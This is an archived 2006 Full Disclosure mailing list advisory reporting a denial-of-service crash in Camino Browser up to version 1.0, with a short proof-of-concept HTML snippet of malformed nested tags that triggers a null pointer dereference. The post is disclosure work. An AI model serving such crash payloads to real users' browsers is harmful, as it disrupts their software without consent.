Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability
From: izi <easy.mask () gmail com>
Date: Fri, 14 Apr 2006 12:48:52 +0200

//----- Advisory


Program          : Camino Browser
Homepage         : http://www.caminobrowser.org
Tested version   : <= 1.0
Found by         : Simon MOREL <philemon at thehackademy dot net>
This advisory    : Simon MOREL <philemon at thehackademy dot net>
Discovery date   : 2006/04/13

//----- Application description


The Camino Project has worked to create a browser that is as functional and
elegant as the computers it runs on.
The Camino web browser is powerful and ready to meet the needs of all users
while remaining simple and elegant in its design..


//----- Description of vulnerability

Camino Browser is prone to a denial-of-service condition when parsing
certain malformed HTML content.


//----- Proof Of Concept


<legend>
<kbd>
<object>
<h4>
</object>
</kbd>



//----- Solution


Not Yet.


//----- Impact


Successful exploitation will cause the browser to crash.


//----- Credits


Simon MOREL <philemon at thehackademy dot net>
http://www.sysdream.com


//----- Greetings


Thomas Waldegger <bugtraq at morph3us dot org>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability izi (Apr 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault